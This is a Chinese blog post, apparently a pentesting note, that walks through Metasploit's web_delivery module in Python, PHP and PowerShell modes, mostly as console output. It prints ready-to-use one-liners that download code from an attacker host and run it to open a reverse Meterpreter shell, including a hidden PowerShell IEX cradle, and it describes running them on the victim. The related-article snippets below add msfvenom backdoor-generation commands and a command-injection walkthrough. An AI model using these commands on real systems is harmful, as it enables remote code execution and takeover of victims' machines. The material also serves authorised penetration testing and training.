Msf - web_delivery

最新推荐文章于 2023-06-07 15:45:13 发布
最新推荐文章于 2023-06-07 15:45:13 发布
阅读量1.8k 收藏
点赞数
分类专栏: Pentesting Metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nixawk/article/details/50719336
版权

Python Payload Mode

msf exploit(web_delivery) > show options 

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  /test            no        The URI to use for this exploit (default is random)


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.102    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Python


msf exploit(web_delivery) > run 
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.102:4444 
msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8080/test
[*] Local IP: http://192.168.1.102:8080/test
[*] Server started.
[*] Run the following command on the target machine:
python -c "import urllib2; r = urllib2.urlopen('http://192.168.1.102:8080/test'); exec(r.read());"

Next, we run the given command on the victim:

python -c "import urllib2; r = urllib2.urlopen('http://192.168.1.102:8080/test'); exec(r.read());"

PHP Payload Mode

msf exploit(web_delivery) > show options 

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  /test            no        The URI to use for this exploit (default is random)


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.102    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   PHP


msf exploit(web_delivery) > run 
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.102:4444 
msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8080/test
[*] Local IP: http://192.168.1.102:8080/test
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.1.102:8080/test'));"

Powershell Payload Mode

msf exploit(web_delivery) > show options 

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  /test            no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: , , seh, thread, process, none)
   LHOST     192.168.1.102    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   2   PSH


msf exploit(web_delivery) > run 
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.102:4444 
msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8080/test
[*] Local IP: http://192.168.1.102:8080/test
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.1.102:8080/test'))

Referecnes

https://www.offensive-security.com/metasploit-unleashed/web-delivery/

Nixawk
关注
专栏目录
MSF之攻击web站点漏洞获取目标机器最高权限
世间繁华梦一出
12-22 2468
利用MSF攻击web站点的漏洞获取最高权限方法一:通过web站点,使用无文件的方式攻击利用执行方法二:通过web站点,上传webshell(msfvenom后门木马),返回给msf方法三:攻击其他端口服务,拿到meterpreter 方法一:通过web站点,使用无文件的方式攻击利用执行 如何利用? 这里介绍一个msf的新模块web_delivery 当攻击者拥有部分受害者主机的控制权,但还没有拿到一个完整的shell时,web_delivery就派上用场了。 web_delivery的主要目的是快速和受害者
msf生成linux shellcode,使用MSF打造各种ShellCode
weixin_39866419的博客
05-13 988
生成各种后门Windows:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -opayload.exeLinux:msfvenom -a x86 --pla...
msfweb:一个简单的容器,用于构建Metasploit框架并通过Web TTY使其可用
02-18
:syringe: msfWeb :spider_web: 一个简单的容器,用于构建Metasploit框架并通过Web TTY使其可用 该项目的目的是在参与过程中快速使用metasploit,而无需ssh或完整的工作站。 以这种方式使用框架具有一些优势 易于部署 可通过任何Web客户端(移动,智能电视等)访问 本机代理支持/绕过防火墙 成分 Metasploit-用于开发,测试和执行漏洞利用的软件平台-https: https://github.com/rapid7/metasploit-framework.git GoTTY-通过浏览器共享您的终端https://github.com/yudai/gotty 用法 拉容器图像 docker pull 0daysimpson/msfweb 运行容器 docker run -d -p 8080:8080 0daysimpson/msfweb 访问网络应用 http
metasploit之webdelivery
Yale的博客
01-31 1279
介绍下webdelivery模块 先是启动metasploit 接下来选择我们使用的模块 Show options看看我们需要设置哪些参数 我们注意到,exploit target出现了python,,莫非还有其他的?我们使用show targets来看看 2代表的PSH表示的powershell。我们这次的实验针对的是windows的,考虑到不是所有windows用户都会有python,...
一条命令上线MSF(Metasploit)-web_delivery模块
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
10-31 2658
一条命令上线MSF(Metasploit)-web_delivery模块
msf利用web_delivery模块 攻击windows实例
cuteyann的博客
05-15 677
目标机存在命令注入漏洞,使用web_delivery模块生成的一条命令建立连接,并且不会在目标主机磁盘写文件,留下文件信息。7、在复制的命令前添加127.0.0.1 && (因为&&命令执行),然后在dvwa命令注入靶场中提交。这里使用比较老的python做webshell就可以了,输入命令:set target 0。(在目标机的cmd也可执行,前提是目标机已经安装了python)8、查看session,然后连接,就可用对目标机进行操作啦。红框里就是生成的命令,把它复制下来。6、运行,输入命令:run。
webMSF搭建
weixin_34214500的博客
10-09 365
去购买一个廉价VPS阿里X/tx学生服务器然后选择Ubuntu系统http://jingyan.baidu.com/article/2c8c281dabacad0008252aa6.html安装MSF然后使用shellinaboxhttp://www.linuxidc.com/Linux/2015-08/121865.htm然后即可使用Web的SSH了!十分方便推荐再开一个HTTP或者FTP....
E004-渗透测试常用工具-使用MSF实现Web传递获取靶机权限.pdf
12-02
在本例中,使用`exploit/multi/script/web_delivery`模块。 8. **设置模块参数**:`set target 1`指定了攻击目标,`set PAYLOAD php/meterpreter/reverse_tcp`设置了PHPMeterpreter反向TCPpayload,`set LHOST 172....
kaliMSF笔记
fhl5203的博客
11-01 1497
metasploit framework 基本使用 msfconsole使用接口 最流行的用户接口 几乎可以使用全部MSF功能 控制台命令支持TAB自动补齐 支持外部命令的执行(系统命令等) 点击鼠标启动 或 msfconsole -h帮助 -q不看banner -r -v版本信息 help / ? / help vulns MSF控制台命令 Banner、Color connect 类似nc s...
msf监听反弹shell
05-24
msf exploit(web_delivery) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(web_delivery) > set LHOST 192.168.0.100 msf exploit(web_delivery) > set LPORT 4444 msf exploit(web_delivery) > run `...
msf web_delivery模块攻击
dichengpai8268的博客
05-03 407
目标机:win7 ip:192.168.31.136 攻击机:kai liunx ip:192.168.31.54 一.使用web_delivery模块的regsvr32_applocker_bypass_server 1.打开神器metasploit,终端输入msfconsole 2.搜索we...
msf web_delivery模块攻击实战操作
欢迎来到神林的博客
04-14 2691
1.打开神器metasploit,终端输入msfconsole(我建议直接图形界面单击打开,方便啊)2.搜索web_delivery模块:search web_delivery3.使用命令:use exploit/multi/script/web_delivery4.设置攻击机Ip:set lhost (这里是你自己的ip)5.运行,exploit,生成:payload:   python -c ...
MSFWeb 后门
weixin_46104215的博客
11-21 1927
Web 后门泛指 WebShell,其实就是一段网页代码,包括 ASP、ASP.NET、PHP、JSP代码等。由于这些代码都运行在服务器,攻击者通过这段精心设计的代码,在服务器端进行一些危险的操作获得某些敏感的技术信息,或者通过渗透操作提权,从而获得服务器的控制权。(更具隐蔽性) Web 后门能提供非常多的功能,如执行命令、浏览文案、辅助提权、执行SQL语句、反弹Shell 等。 Windows 系统下比较出名的莫过于 “中国菜刀”,还有很多替代“中国菜刀”的跨平台开源工具...
msf_web_delivery模块漏洞(win7以上注册表)
芥子
01-25 1079
目标机:win10   ip:192.168.1.8 攻击机:kali Linux    ip:192.168.1.63 一:直接打开metasploit,也可在终端直接输入msfconsole msf的用法:  查找web_delivery模块: search web_delivery 使用web_delivery模块:use exploit/windows/misc/
学习记录:通过MSF利用Web代码注入渗透服务器
qq_60709081的博客
06-07 1411
靶机: Windows 10 专业版 22H2攻击机:Kali网站软件:PhpStudy靶场:DVWA就不演示搭建过程了(主要是懒)。本次测试的网页如下:难度等级:Low主要是学习怎么用代码注入和MSF的结合去控制主机(当然用WebShell去连接更简单)首先分析此页面使用的是命令拼接的方式来实现功能的,所以我在正常的Ping xxx 后面又加上了 “&” ,由此尝试可不可以执行别的命令,结果如上图。// 输入的语句点击Submit, 发现返回了Python的版本号!
(记录向)使用MSFweb_delivery模块上线
daxi0ng的博客
11-30 1466
前言:在msf上生成木马传到目标机器执行上线累死个人,还是一条命令上线比较舒服。 目标环境: Centos6.5 1、选择exploit/multi/script/web_delivery模块 2、选择目标系统,我这里选择Linux 3、选择payload,我这里选择linux/x64/meterpreter/reverse_tcp , 4、本机监听一下 5、运行,生成一条命令 6、目标机器执行上线。 7、获取一个友好的交互界面。python -c 'import ...
使用Metasploit web_delivery 反弹shell
大方子
02-07 5448
Metasploit的Web Delivery Script是一个多功能模块,可在托管有效负载的攻击机器上创建服务器。当受害者连接到攻击服务器时,负载将在受害者机器上执行。 此漏洞需要一种在受害机器上执行命令的方法。特别是你必须能够从受害者到达攻击机器。远程命令执行是使用此模块的攻击向量的一个很好的例子。Web Delivery脚本适用于php,python和基于PowerShell的应用程序。 当攻击者对系统有一定的控制权时,这种攻击成为一种非常有用的工具,但不具有完整的shell。另外,由于服务器和有效
DMZ下使用web_delivery 介绍
每天多一分钟学习,生命就多一份精彩
06-08 1338
From : http://evi1cg.me/archives/Use_Web_delivery_Under_DMZ.html?utm_source=tuicool&utm_medium=referral 之前碰到的问题,自己的主机做了DMZ,设置[b]web_delivery[/b]时,发现将lhost设置成外网ip,则脚本不能运行,如果设置成内网ip,则反弹payload反弹的
MSF渗透测试之msfvenom提权之python
lza20001103的博客
04-05 3489
MSF渗透测试之msfvenom提权之python
root@in_dev_docker:/apollo# cat scripts/msf_create_lossless_map.sh #! /bin/bash DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" cd "${DIR}/.." source "${DIR}/apollo_base.sh" echo $APOLLO_BIN_PREFIX DIR_NAME=$1 ZONE_ID=$2 IN_FOLDER=$3 function create_lossless_map() { $APOLLO_BIN_PREFIX/modules/localization/msf/local_tool/map_creation/lossless_map_creator \ --use_plane_inliers_only true \ --pcd_folders $1 \ --pose_files $2 \ --map_folder $IN_FOLDER \ --zone_id $ZONE_ID \ --coordinate_type UTM \ --map_resolution_type single } # create_lossless_map "${DIR_NAME}/pcd" "${DIR_NAME}/pcd/corrected_poses.txt" create_lossless_map "${DIR_NAME}" "${DIR_NAME}/corrected_poses.txt" root@in_dev_docker:/apollo#
最新发布
07-16
根据您提供的脚本内容,`scripts/msf_create_lossless_map.sh` 脚本的作用是创建一个无损地图(lossless map)。该脚本接受三个参数:DIR_NAME,ZONE_ID,IN_FOLDER。 脚本的主要部分是 `create_lossless_map` 函数,它调用了 `$APOLLO_BIN_PREFIX/modules/localization/msf/local_tool/map_creation/lossless_map_creator` 可执行文件来创建无损地图。函数的参数是 `--use_plane_inliers_only true`、`--pcd_folders $1`、`--pose_files $2`、`--map_folder $IN_FOLDER`、`--zone_id $ZONE_ID`、`--coordinate_type UTM` 和 `--map_resolution_type single`。 在脚本的末尾,注释掉了一行 `create_lossless_map "${DIR_NAME}/pcd" "${DIR_NAME}/pcd/corrected_poses.txt"` ,而使用了另一行 `create_lossless_map "${DIR_NAME}" "${DIR_NAME}/corrected_poses.txt"` 来调用 `create_lossless_map` 函数。 根据脚本内容来看,它的目的是根据给定的参数来创建无损地图。要执行该脚本,您需要提供正确的参数,并确保相关的可执行文件和文件夹存在于指定的位置。 请注意,我只能提供对脚本内容的解释和理解,并不能保证该脚本在您的环境中能够正常工作。如果您遇到任何错误或问题,请提供更多详细信息以便我们能够更好地帮助您。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值